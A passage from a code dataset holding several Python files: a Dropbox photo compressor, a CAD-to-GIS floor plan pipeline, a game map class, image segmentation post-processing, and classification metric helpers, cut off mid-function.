open(\"./tinikey.txt\") as file:\n tinikey = file.read()\nelse:\n tinikey = input(\"Type your Tinify API Token: \")\n with open(\"tinikey.txt\", \"w+\") as f:\n f.write(tinikey)\n\n# SELECT SOURCE AND DESTINATION FOLDER\nsource_folder = input(\n \"Where are your original photos stored? (Leave empty if in app's root folder) \")\nif source_folder != \"\":\n source_folder = \"/\" + source_folder\n\ndest_folder = input(\n \"Where do you want to store the optimized photos? 
\")\n#dest_folder = \"/\" + dest_folder\n\n# AUTHENTICATION\ndbx = dropbox.Dropbox(dropkey)\ntinify.key = tinikey\n\ndbx.users_get_current_account()\nresponse = dbx.files_list_folder(source_folder)\nfiles = response.entries\n\n# CHECKING FOR DESTINATION FOLDER IN DROPBOX\nfound = False\nfor item in response.entries:\n if str(type(item))[22:-10] == \"Folder\":\n if (str(item.path_display)[1:]) == dest_folder:\n found = True\n else:\n break\nif found == False:\n dbx.files_create_folder(\"/\" + dest_folder)\ndest_folder = \"/\" + dest_folder\n\n# CHECKING FOR FOLDER LOCALLY AND CREATING IF NOT EXISTING\nif not os.path.isdir(\".\" + dest_folder):\n os.mkdir(\".\" + dest_folder)\n\n# COMPRESSING ALL PHOTOS IN GIVEN FOLDER\nfor item in files:\n if str(type(item))[22:-10] == \"File\":\n source = tinify.from_url(\n dbx.files_get_temporary_link(item.path_display).link)\n dest = dest_folder[1:] + \"/\" + item.name\n source.to_file(dest)\nprint(\"Photos successfully optimized\")\nprint(\"Starting uploading\")\n# UPLOAD ALL PHOTOS\nphotos = os.listdir(\".\" + dest_folder)\ncount = 0\nfor item in photos:\n itempath = \".\" + dest_folder + \"/\" + item\n with open(itempath, 'rb') as f:\n dbx.files_upload(f.read(), dest_folder + \"/\" + item, mute=True)\n count += 1\n print(\"Progress: \", count, \"out of \", len(photos), \"uploaded\")\n\n# DELETING ORIGINAL PHOTOS\nif input(\"Do you want to delete the original photos? Y/N: \") == \"Y\":\n print(\"please wait...\")\n","sub_path":"tinioo.py","file_name":"tinioo.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"110983947","text":"# -*- coding: utf-8 -*-\n\"\"\"\nName: floorplans_to_gis\nAuthor: Ulises Guzman\nCreated: 06/29/2017\nCopyright: (c)\nArcGIS Version: ArcGIS Pro 1.4\nConda Environment : UlisesPro\nPython Version: 3x\nPostgreSQL Version: N/A\n--------------------------------------------------------------------------------\nThis script georeferences our CAD floor plans by creating world files and prj\n(projection files) for them.\n--------------------------------------------------------------------------------\n\"\"\"\nimport os\nimport shutil\nimport inspect\nimport time\nimport re\nfrom win32com import client\nimport pandas as pd\n# import geopandas as gpd\nimport arcpy\n\n\ndef lisp_dwg_runner(dwg, lisp, read_only_mode=True):\n \"\"\" This function run lisp routines against DWG files. It also provides\n a way for running lisp routines on read only mode, this is specially useful\n when running graphic reports for space management purposes.\n\n Args:\n dwg (string) = The full path to the dwg file\n lisp (string) = The full path to a lisp routine\n\n Returns:\n\n Examples:\n >>> lisp_dwg_runner(dwg, lisp, read_only_mode=True)\n Executing lisp_dwg_runner...\n Running lisp against dwg\n The lisp routine has been successfully executed\n \"\"\"\n # getting the name of the function programatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... 
'.format(func_name))\n acad = client.Dispatch('AutoCAD.Application')\n acad.Visible = True\n doc = acad.ActiveDocument\n # the AutoCAD console requires the use of double quotes in commands\n if read_only_mode:\n try:\n print('Running {} against {}'.format(lisp, dwg))\n doc.SendCommand('(command \"_.OPEN\" \"%s\" \"Y\")\\n' % dwg)\n doc.SendCommand(\"(acad-push-dbmod)\\n\")\n doc.SendCommand(\"SDI 1\\n\")\n doc.SendCommand(\"FILEDIA 0\\n\")\n doc.SendCommand('''(LOAD \"%s\")\\n''' % lisp)\n doc.SendCommand(\"(acad-pop-dbmod)\\n\")\n print('The routine has been successfully executed in read only'\n ' mode')\n except Exception as e:\n raise e\n\n else:\n try:\n print('Running {} against {}'.format(lisp, dwg))\n doc.SendCommand('(command \"_.OPEN\" \"%s\" \"Y\")\\n' % dwg)\n # doc.SendCommand(\"SDI 1\\n\")\n doc.SendCommand(\"FILEDIA 0\\n\")\n doc.SendCommand('''(LOAD \"%s\")\\n''' % lisp)\n # this part saves changes to the DWG file\n doc.SendCommand('(command \"_.save\" \"\" \"N\")\\n')\n print('The routine has been successfully executed')\n except Exception as e:\n raise e\n\n\ndef dwg_selector(fn=None, dwg_loc=None, pattern=None, **kwargs):\n \"\"\" This function filters and iterates over relevant dwg files while\n running a function on them if the fn argument is not None.\n\n Args:\n fn (function) = A function in which one of its arguments is a dwg file\n dwg_loc (string) = The full path to a folder that contains dwg files\n pattern (regex-string) = i.e. r'^S-(\\w)+-(?!ROOF)\\w+-DWG-BAS(\\.)dwg'\n kwargs = The arguments to be passed on to the embedded function\n\n Returns:\n\n Examples:\n >>> dwg_selector(fn=lisp_dwg_runner, dwg_loc=dwg_output_loc, pattern=None,\n lisp=xdata_to_gis, read_only_mode=False)\n Executing dwg_selector...\n Processing 'E:\\\\Users\\\\Desktop\\\\S-170B-01-DWG-BAS.dwg'\n Executing lisp_dwg_runner\n \"\"\"\n # getting the name of the function programatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... '.format(func_name))\n workspace = os.getcwd()\n if dwg_loc is None:\n dwg_loc = workspace\n if pattern is None:\n # selects DWG files excluding ROOF and MECH files\n pattern = r'^S-(\\w)+-(?!ROOF)\\w+-DWG-BAS(\\.)dwg'\n os.chdir(dwg_loc)\n try:\n dwg_selection = re.compile(pattern)\n # print(dwg_selection)\n for root, dirs, files in os.walk(\".\", topdown=False):\n for name in files:\n if dwg_selection.search(name):\n dwg_path = os.path.join(os.path.abspath(root), name)\n # the AutoCAD console requires the use of double quotes\n # when opening drawings\n dwg_path = dwg_path.replace('\\\\', '\\\\\\\\')\n # print(root, name)\n if fn is not None:\n print('Processing: {}'.format(dwg_path))\n time.sleep(1)\n fn(dwg_path, **kwargs)\n print('All wrapped up here sir! Will there be anything else?'\n '\\nJ.')\n except Exception as e:\n raise e\n\n\ndef gis_ready_files(dwg, dwg_filter, out_loc):\n \"\"\" This function selects and copies only the dwg files that match the\n values in a provided pandas series.\n\n Args:\n dwg (string) = A full path to a dwg file (i.e. 
'E:\\\\S-170B-01-DWG-BAS.dwg')\n dwg_filter (pandas series) = This expresses which values are supposed to\n be kept by the function\n out_loc (string) = This is where the files will be copied to\n\n\n Returns:\n\n Examples:\n >>> gis_ready_files('S-378E-01-BAS.dwg', dwg_filter_series, out_loc=None)\n Executing gis_ready_files...\n The files have been copied to the desktop\n \"\"\"\n # getting the name of the function programmatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... '.format(func_name))\n pattern = r'S-(\\w)+-(?!ROOF)\\w+-DWG-BAS(\\.)dwg'\n match = re.search(pattern, dwg)\n if match:\n found = match.group()\n if found in dwg_filter.unique():\n try:\n dwg = dwg.replace('\\\\\\\\', '\\\\')\n shutil.copy(dwg, out_loc)\n print(out_loc)\n except Exception as e:\n print(e)\n raise e\n print('The files have been copied to {}'. format(out_loc))\n\n\ndef cad_to_gis_obj(dwg, local_fc, out_loc=None, out_name=None):\n \"\"\" This function creates a GIS object from a local CAD feature class, its\n output default location is the 'in_memory' workspace\n\n Args:\n dwg (string) = A full path to a dwg file (i.e. 'E:\\\\S-170B-01-DWG-BAS.dwg')\n local_fc (string) = The name of a CAD local feature class\n out_loc (string) = The output location for the GIS object\n out_name (string) = The name to be given to the outputted GIS object\n\n Returns:\n\n Examples:\n >>> cad_to_gis_obj(dwg, 'SPACEDATA', dwg_filter_series, out_loc=None,\n out_name='SPACEDATA')\n Executing cad_to_gis_obj...\n The SPACEDATA gis feature has been created in in_memory\n \"\"\"\n # getting the name of the function programmatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... '.format(func_name))\n dwg_data = r'{}\\\\{}'.format(dwg, local_fc)\n if out_loc is None:\n # Writing data to the in-memory workspace is often significantly faster\n # than writing to other formats such as a shapefile or geodatabase\n # feature class.\n out_loc = 'in_memory'\n if out_name is None:\n pattern = r'S-(\\w)+-(?!ROOF)\\w+-DWG-BAS(\\.)dwg'\n match = re.search(pattern, dwg)\n if match:\n out_name = match.group()\n # S-170B-01-DWG-BAS.dwg to S_170B_01_DWG_BAS\n out_name = out_name[:-4].replace('-', '_')\n try:\n print(dwg, dwg_data, out_loc, out_name)\n arcpy.FeatureClassToFeatureClass_conversion(dwg_data, out_loc,\n out_name, None, '', '')\n except Exception as e:\n print(e)\n raise e\n print(\n 'The {} gis feature has been created in {}'.format(out_name, out_loc))\n\n\ndef gis_obj_concatenate(out_name, out_loc=None, workspace=None,\n drop_field=None):\n \"\"\" This function merges all the GIS features in the provided workspace\n while deleting unnecessary fields\n\n Args:\n out_name (string)= The name to be given to the outputted GIS object\n out_loc (string) = The output location for the GIS object\n workspace (string) = The folder to which arcpy.env.workspace must be set\n drop_field (list) = A list of column names to be removed\n\n Returns:\n\n Examples:\n >>> gis_obj_concatenate('ucb_floorplans.shp',\n master_shp_output, workspace=None, drop_field=None)\n Executing gis_obj_concatenate...\n ucb_floorplans.shp has been successfully created\n \"\"\"\n # getting the name of the function programmatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... 
'.format(func_name))\n arcpy.env.overwriteOutput = True\n if workspace is None:\n arcpy.env.workspace = 'in_memory'\n if out_loc is None:\n out_loc = os.getcwd()\n if drop_field is None:\n drop_field = ['Entity', 'Layer', 'LyrColor', 'LyrLnType', 'LyrLineWt',\n 'Color', 'Linetype', 'Elevation', 'LineWt', 'RefName']\n output = '{}\\{}'.format(out_loc, out_name)\n try:\n featureclasses = arcpy.ListFeatureClasses()\n arcpy.Merge_management(featureclasses, output)\n arcpy.DeleteField_management(output, drop_field)\n # print(featureclasses)\n except Exception as e:\n print(e)\n raise e\n print('{} has been successfully created'.format(out_name))\n\n\nif __name__ == '__main__':\n # ******************* COPYING RELEVANT FLOOR PLANS ******************\n dwg_filter = r'\\\\Kingtut\\dwg\\student\\Mark\\GeoRef Floor Plans\\\\' \\\n 'floorplans_in_xrefs.csv'\n dwg_filter_series = pd.read_csv(dwg_filter, header=None, squeeze=True)\n # dwg_output_loc = r'E:\\Users\\ulgu3559\\Desktop\\WORLDTEST\\dwg_dos'\n dwg_output_loc = r'T:\\gis_scratch'\n dwg_loc = r'\\\\kingtut.colorado.edu\\smscale\\dwg'\n # gis_ready_files('S-378E-01-DWG-BAS.dwg', dwg_filter_series, out_loc=None)\n dwg_selector(fn=gis_ready_files, dwg_loc=dwg_loc, pattern=None,\n dwg_filter=dwg_filter_series, out_loc=dwg_output_loc)\n # ******************* CREATING GIS ATTRIBUTES ***********************\n # xdata_to_gis = r'G:/linkatt/XDATAtoGIS3.lsp'\n xdata_to_gis = r'T:\\gis_scripts\\lisp\\xdata_to_gis.lsp'\n dwg_selector(fn=lisp_dwg_runner, dwg_loc=dwg_output_loc, pattern=None,\n lisp=xdata_to_gis, read_only_mode=False)\n # meridian_sustaining_bldg = r'G:\\Ulises_Python_Scripts\\worldfiles'\n # meridian_sustaining_bldg = r'E:\\Users\\ulgu3559\\Desktop\\WORLDTEST\\dwg'\n # ******************* CREATING GIS FILE ****************************\n dwg_selector(fn=cad_to_gis_obj, dwg_loc=dwg_output_loc, pattern=None,\n local_fc='SPACEDATA', out_loc=None, out_name=None)\n # master_shp_output = r'E:\\Users\\ulgu3559\\Desktop\\WORLDTEST\\space_shp'\n master_shp_output = r'T:\\shapefiles\\floorplans'\n gis_obj_concatenate('ucb_floorplans.shp',\n master_shp_output, workspace=None, drop_field=None)\n","sub_path":"python/floorplans_to_gis.py","file_name":"floorplans_to_gis.py","file_ext":"py","file_size_in_byte":10975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"503302194","text":"\"\"\"\nThe BattleMap class.\nRepresents a battlefield as a data structure.\n\"\"\"\n\nimport copy\n\nclass BattleMap:\n \"\"\"\n A BattleMap contains information about a battlefield. 
It tracks object locations and terrain information.\n \"\"\"\n def __init__(self):\n self.terrain = [[]] # The \"ground\" of the battlefield (grass, hills, water, etc.)\n self.objects = [[]] # The \"objects\" of the battlefield (units, obstacles, etc.)\n self.dimension = [0, 0] # The size of the battlefield grid.\n self.name = 'map'\n self.victory_condition = ''\n\n self.grassTile = None\n self.hillTile = None\n self.waterTile = None\n\n def __str__(self):\n return self.name\n\n def data(self):\n \"\"\"\n Returns a string that represents the terrain grid.\n :return:\n \"\"\"\n string = ''\n for i in range(0, len(self.terrain)):\n string = string + '\\n' + str(self.terrain[i]).strip('[]')\n return string\n\n def onTileData(self):\n \"\"\"\n Returns a string that represents the objects grid.\n :return:\n \"\"\"\n string = ''\n for i in range(0, len(self.objects)):\n string = string + '\\n' + str(self.objects[i]).strip('[]')\n return string\n\n def makeTile(self, c):\n \"\"\"\n Returns a reference to the appropriate tile. Uses the Flyweight pattern to reduce memory usage.\n :param c: Specifies the type of tile to return.\n :return: The appropriate tile, given c.\n \"\"\"\n if(c in 'g'):\n if(self.grassTile is None):\n self.grassTile = GrassTile()\n tile = self.grassTile\n elif(c in 'h'):\n if (self.hillTile is None):\n self.hillTile = HillTile()\n tile = self.hillTile\n elif (c in 'w'):\n if (self.waterTile is None):\n self.waterTile = WaterTile()\n tile = self.waterTile\n else:\n raise BadMapFormatException\n\n return tile\n\n def addObject(self, onTile, location):\n col = copy.copy(location[0])\n row = copy.copy(location[1])\n self.objects[row][col] = onTile\n\n def replaceObjects(self, originals, replacements):\n \"\"\"\n Goes through the map's objects and replaces objects in originals with the corresponding object in replacements.\n :param originals:\n :param replacements:\n :return:\n \"\"\"\n # \"item\" is (row, col, character)\n map_object_generator = nested_list_traversal(self.objects)\n while True:\n try:\n # use the builtin next() so this works on Python 3 as well\n item = next(map_object_generator)\n if str(item[2]) in originals:\n index = originals.index(item[2])\n replacement = replacements.pop(index)\n originals.remove(item[2])\n self.objects[item[0]][item[1]] = replacement\n replacement.setLocation( (item[0], item[1]) )\n except StopIteration:\n return 0\n except:\n raise\n\n def condensedObjects(self):\n map_object_generator = nested_list_traversal(self.objects)\n condensed_objects_list = []\n while True:\n try:\n item = next(map_object_generator)\n if 'empty' not in item:\n condensed_objects_list.append(item[2])\n except StopIteration:\n return condensed_objects_list\n except:\n raise\n\n def setMap(self, nestedList):\n self.terrain = nestedList\n self.objects = copy.deepcopy(nestedList)\n\n def moveObject(self, onTile):\n\n # Remove unit from object grid\n for i in range(0, self.dimension[1]):\n for j in range(0, self.dimension[0]):\n if(onTile == self.objects[i][j]):\n self.objects[i][j] = 'empty'\n\n # Place unit in new location on object grid\n newLocation = onTile.location\n newCol = newLocation[0]\n newRow = newLocation[1]\n self.objects[newRow][newCol] = onTile #Remember, object array is (y, x)\n\n def getObject(self, location):\n col = location[0]\n row = location[1]\n return self.objects[row][col]\n\n def isOccupied(self, locationTile):\n col = locationTile.location[0]\n row = locationTile.location[1]\n if('empty' == self.objects[row][col]):\n return False\n else:\n return True\n\n def setVictory(self, boolean):
self.victory_condition = boolean\n\n\nclass Tile:\n \"\"\"\n The Tile class. Uses the Flyweight design pattern to minimize memory usage.\n\n At any given time, there exists only one of a particular tile type. All tiles of that type are just references to\n the single tile. This means that all grass tiles on a map are simply references to a single GrassTile object.\n \"\"\"\n def __str__(self):\n return 'Tile'\n\n def __repr__(self):\n return self.__str__()\n\nclass GrassTile(Tile):\n def __init__(self):\n self.cross = 'normal'\n self.slow = 0\n self.defense = 0\n\n def __str__(self):\n return 'g'\n\nclass HillTile(Tile):\n def __init__(self):\n self.cross = 'normal'\n self.slow = 1\n self.defense = 5\n\n def __str__(self):\n return 'h'\n\nclass WaterTile(Tile):\n def __init__(self):\n self.cross = 'water'\n self.slow = 0\n self.defense = 0\n\n def __str__(self):\n return 'w'\n\nclass SolidTile(Tile):\n def __init__(self):\n self.cross = 'wall'\n self.slow = 0\n self.defense = 0\n\n def __str__(self):\n return 's'\n\nclass BadMapFormatException(Exception):\n def __str__(self):\n return 'BadMapFormatException'\n\n\ndef nested_list_traversal(list):\n \"\"\"\n A python generator for nested lists.\n :param list: A nested list.\n :return: The row, column, and element occupying that spot in the list. Progresses forward each call.\n \"\"\"\n try:\n for row in range(0, len(list)):\n for col in range(0, len(list[row])):\n yield (row, col, list[row][col])\n except TypeError:\n yield list","sub_path":"src/Elements/BattleMap.py","file_name":"BattleMap.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"381796956","text":"import os\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom PIL import Image\r\nimport math\r\nfrom scipy.ndimage import measurements, morphology\r\nfrom PIL import Image\r\nfrom matplotlib import cm\r\n\r\n\r\n\r\n\r\n# MAIN #\r\ndef segmentation_post_proccess(img,mask,target_dir,img_name):\r\n #Support functions\r\n def circular_filter(radius):\r\n radius = np.int(radius)\r\n kernel = np.zeros((2 * radius + 1, 2 * radius + 1), np.uint8)\r\n y, x = np.ogrid[-radius:radius + 1, -radius:radius + 1]\r\n mask = x ** 2 + y ** 2 <= radius ** 2\r\n kernel[mask] = 1\r\n return kernel\r\n\r\n\r\n def image_preprocess(img):\r\n img_pil = Image.fromarray(np.uint8(img*255)).resize((512, 512))\r\n img = np.resize(img, (512, 512, 3))\r\n return img_pil\r\n\r\n\r\n\r\n def mask_cropper(img, mask):\r\n # Crop image with 2D mask\r\n big_mask_inter = np.zeros((512, 512, 3))\r\n big_mask_inter[:, :, 0] = mask\r\n big_mask_inter[:, :, 1] = mask\r\n big_mask_inter[:, :, 2] = mask\r\n im_array = np.asarray(img)\r\n img_rgb = Image.fromarray(im_array.astype('uint8'), 'RGB')\r\n cropped_img_array = img_rgb * np.uint8(big_mask_inter)\r\n cropped_img = Image.fromarray(cropped_img_array.astype('uint8'), 'RGB')\r\n return cropped_img\r\n\r\n def morphological_algorithm(mask, image, flag='segmentation succeed'):\r\n ret, thresh_mask = cv2.threshold(mask, 127, 1, cv2.THRESH_BINARY)\r\n\r\n num_labels_orig, labels_im_orig = cv2.connectedComponents(thresh_mask)\r\n (unique, counts) = np.unique(labels_im_orig, return_counts=True)\r\n\r\n frequencies = np.asarray((unique[1:], counts[1:])).T # Return [unique1,numbers;unique2,numbers..]\r\n max_pixels = np.max(frequencies[:, 1], axis=0)\r\n label_radius = np.floor((((max_pixels) / 8) / (math.pi)) ** 0.5)\r\n kernel_8 = 
circular_filter(label_radius)\r\n opening = cv2.morphologyEx(thresh_mask, cv2.MORPH_OPEN, kernel_8)\r\n largest_label = np.argmax(frequencies[:, 1], axis=0) + 1\r\n largest_component = labels_im_orig == largest_label\r\n x = opening + largest_component\r\n x1 = x == 1\r\n x2 = x == 2\r\n opening_and_component = np.uint8(x1 + x2)\r\n closing = cv2.morphologyEx(opening_and_component, cv2.MORPH_CLOSE, kernel_8)\r\n num_labels_clos, labels_im_clos = cv2.connectedComponents(closing)\r\n list_of_centers = []\r\n for i in range(1, num_labels_clos):\r\n center_i = measurements.center_of_mass(labels_im_clos == i)\r\n list_of_centers.append([np.floor(center_i[1]), np.floor(center_i[0])])\r\n euclidean_pwr = (list_of_centers - np.array([256, 256])) ** 2\r\n euclidean_dist = (euclidean_pwr[:, 0] + euclidean_pwr[:, 1]) ** 0.5\r\n most_centered_label = np.argmin(euclidean_dist) + 1\r\n binary_mask = labels_im_clos == most_centered_label\r\n binary_mask_filled = morphology.binary_fill_holes(binary_mask, structure=None, output=None, origin=0)\r\n\r\n kernel = np.ones((3, 3), np.uint8)\r\n erosion = cv2.erode(binary_mask_filled.astype('uint8'), kernel, iterations=1)\r\n edges = binary_mask_filled - erosion\r\n cropped_image = mask_cropper(image, binary_mask_filled)\r\n num_labels_edges, labels_edges = cv2.connectedComponents(edges)\r\n if num_labels_edges > 2:\r\n flag = 'segmentation failed'\r\n return binary_mask, cropped_image, edges, flag\r\n\r\n\r\n\r\n\r\n #Main function\r\n\r\n image_pil = image_preprocess(img)\r\n binary_mask, cropped_image, edges, flag = morphological_algorithm(mask, image_pil)\r\n Cropped_img_loc =os.path.join(target_dir, 'Cropped_Img')\r\n if not os.path.isdir(Cropped_img_loc):\r\n os.mkdir(Cropped_img_loc)\r\n cropped_image.save(os.path.join(Cropped_img_loc, img_name))\r\n binary_mask = Image.fromarray(binary_mask)\r\n binary_mask.save(os.path.join(target_dir, 'binary_mask_' + img_name))\r\n binary_edges = Image.fromarray(edges*255)\r\n binary_edges.save(os.path.join(target_dir, 'binary_edges_' + img_name))\r\n return binary_mask, cropped_image, edges, flag\r\n","sub_path":"eye pathology application/segmentation_result_morphological_func.py","file_name":"segmentation_result_morphological_func.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"527204770","text":"import collections\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n\n anagrams, result = collections.defaultdict(list), []\n\n for s in strs:\n sorted_str = ''.join(sorted(s))\n anagrams[sorted_str].append(s)\n for anagram in anagrams.values():\n anagram.sort()\n result.append(anagram)\n return result\n\n\nstrs = ['eat', 'tea', 'tan', 'ate', 'nat']\nresult = Solution().groupAnagrams(strs)\nprint(result)\n \n","sub_path":"anagrams/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"114768792","text":"import numpy as np\n\ndef mean_field(U, P, edges, max_iter=100):\n \"\"\"Compute mean-field marginals.\n\n Inputs: \n (n_nodes, n_states) matrix of unary potentials U.\n (n_edges, n_states, n_states) matrix of edge potentials P\n (n_edges,) list of (vi, vj) tuples indicating edges\n max number of iterations of mean field (default=100)\n\n The algorithm runs for max_iter iterations or until convergence\n threshold of 1e-4.\n 
\"\"\"\n iter = 0\n n_nodes, n_states = U.shape\n\n edge_potentials = { v : dict() for v in xrange(n_nodes) }\n\n for i, (v1, v2) in enumerate(edges):\n edge_potentials[v1][v2] = P[i]\n edge_potentials[v2][v1] = P[i].T\n\n Q = U.copy()\n\n max_err = 1\n while iter < max_iter and max_err > 1e-4:\n max_err = 0\n for i in xrange(n_nodes):\n t = U[i].copy()\n for n, E in edge_potentials[i].iteritems():\n t += E.dot(Q[n])\n # print t\n t = np.exp(t)\n Q_new = t / np.sum(t)\n max_err = np.max([max_err, np.linalg.norm(Q_new - Q[i])])\n Q[i] = Q_new\n iter += 1\n\n return Q","sub_path":"pgms/meanfield.py","file_name":"meanfield.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"417176681","text":"import numpy as np\nfrom torch import Tensor\nfrom sklearn.metrics import roc_curve, auc, hamming_loss, accuracy_score, recall_score, precision_score, f1_score, roc_auc_score\nimport pdb\n\nCLASSIFICATION_THRESHOLD: float = 0.5 # Best keep it in [0.0, 1.0] range\n \nlabels_list = ['P1','P2','P3','P4','P5']\n\n\n# def accuracy(out, labels):\n# outputs = np.argmax(out, axis=1)\n# return np.sum(outputs == labels)\n\n\ndef recall_macro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis=1)\n print(y_pred)\n y_true = y_true.cpu()\n y_true = np.argmax(y_true, axis=1)\n print(y_true)\n return recall_score(y_pred, y_true, average='macro')\n\ndef recall_by_class(y_pred: Tensor, y_true: Tensor, labels: list = labels_list):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis=1)\n print(y_pred)\n y_true = y_true.cpu()\n y_true = np.argmax(y_true, axis=1)\n d = []\n for i in range(len(labels)): \n out_pred = []\n out_true = []\n num1 = 0\n num2 = 0\n for j in y_pred:\n if j == i:\n out_pred.append(1)\n num1 += 1\n else:\n out_pred.append(0)\n for j in y_true:\n if j == i:\n out_true.append(1)\n num2 += 1\n else:\n out_true.append(0)\n print(num1,num2)\n d.append(recall_score(out_pred, out_true, average='binary'))\n return d\n\ndef recall_micro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return recall_score(y_pred, y_true, average='micro')\n\ndef precision_macro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return precision_score(y_pred, y_true, average='macro')\n\ndef precision_micro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return precision_score(y_pred, y_true, average='micro')\n\ndef precision_by_class(y_pred: Tensor, y_true: Tensor, labels: list = labels_list):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis=1)\n print(y_pred)\n y_true = y_true.cpu()\n y_true = np.argmax(y_true, axis=1)\n d = []\n for i in range(len(labels)): \n out_pred = []\n out_true = []\n for j in y_pred:\n if j == i:\n out_pred.append(1)\n else:\n out_pred.append(0)\n for j in y_true:\n if j == i:\n out_true.append(1)\n else:\n out_true.append(0)\n d.append(precision_score(out_pred, out_true, average='binary'))\n return d\n\ndef f1_macro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return f1_score(y_pred, y_true, average='macro')\n\ndef f1_micro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return f1_score(y_pred, y_true, 
average='micro')\n\ndef f1_by_class(y_pred: Tensor, y_true: Tensor, labels: list = labels_list):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis=1)\n print(y_pred)\n y_true = y_true.cpu()\n y_true = np.argmax(y_true, axis=1)\n d = []\n for i in range(len(labels)): \n out_pred = []\n out_true = []\n for j in y_pred:\n if j == i:\n out_pred.append(1)\n else:\n out_pred.append(0)\n for j in y_true:\n if j == i:\n out_true.append(1)\n else:\n out_true.append(0)\n d.append(f1_score(out_pred, out_true, average='binary'))\n return d\n\n\ndef accuracy(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.cpu()\n outputs = np.argmax(y_pred, axis=1)\n return np.mean(outputs.numpy() == y_true.detach().cpu().numpy())\n\n\ndef accuracy_multilabel(y_pred: Tensor, y_true: Tensor, sigmoid: bool = True):\n if sigmoid:\n y_pred = y_pred.sigmoid()\n y_pred = y_pred.cpu()\n y_true = y_true.cpu()\n outputs = np.argmax(y_pred, axis=1)\n real_vals = np.argmax(y_true, axis=1)\n return np.mean(outputs.numpy() == real_vals.numpy())\n\n\ndef accuracy_thresh(\n y_pred: Tensor,\n y_true: Tensor,\n thresh: float = CLASSIFICATION_THRESHOLD,\n sigmoid: bool = True,\n):\n \"Compute accuracy when `y_pred` and `y_true` are the same size.\"\n if sigmoid:\n y_pred = y_pred.sigmoid()\n return ((y_pred > thresh) == y_true.bool()).float().mean().item()\n\n\n# return np.mean(((y_pred>thresh)==y_true.byte()).float().cpu().numpy(), axis=1).sum()\n\n\ndef fbeta(\n y_pred: Tensor,\n y_true: Tensor,\n thresh: float = 0.3,\n beta: float = 2,\n eps: float = 1e-9,\n sigmoid: bool = True,\n):\n \"Computes the f_beta between `preds` and `targets`\"\n beta2 = beta ** 2\n if sigmoid:\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > thresh).float()\n y_true = y_true.float()\n TP = (y_pred * y_true).sum(dim=1)\n prec = TP / (y_pred.sum(dim=1) + eps)\n rec = TP / (y_true.sum(dim=1) + eps)\n res = (prec * rec) / (prec * beta2 + rec + eps) * (1 + beta2)\n return res.mean().item()\n\n\ndef roc_auc(y_pred: Tensor, y_true: Tensor):\n # ROC-AUC calcualation\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n\n y_true = y_true.detach().cpu().numpy()\n y_pred = y_pred.detach().cpu().numpy()\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_true.ravel(), y_pred.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n return roc_auc[\"micro\"]\n\n\ndef Hamming_loss(\n y_pred: Tensor,\n y_true: Tensor,\n sigmoid: bool = True,\n thresh: float = CLASSIFICATION_THRESHOLD,\n sample_weight=None,\n):\n if sigmoid:\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > thresh).cpu()\n y_true = y_true.cpu()\n return hamming_loss(y_true, y_pred, sample_weight=sample_weight)\n\n\ndef Exact_Match_Ratio(\n y_pred: Tensor,\n y_true: Tensor,\n sigmoid: bool = True,\n thresh: float = CLASSIFICATION_THRESHOLD,\n normalize: bool = True,\n sample_weight=None,\n):\n if sigmoid:\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > thresh).float()\n return accuracy_score(\n y_true, y_pred, normalize=normalize, sample_weight=sample_weight\n )\n\n\ndef F1(y_pred: Tensor, y_true: Tensor, threshold: float = CLASSIFICATION_THRESHOLD):\n return fbeta(y_pred, y_true, thresh=threshold, beta=1)\n\ndef roc_auc_score_by_class(y_pred:Tensor, y_true:Tensor, labels:list = labels_list):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis = 1).numpy()\n y_true = y_true.cpu()\n y_true = y_true.detach().cpu().numpy()\n roc_auc_score_d = 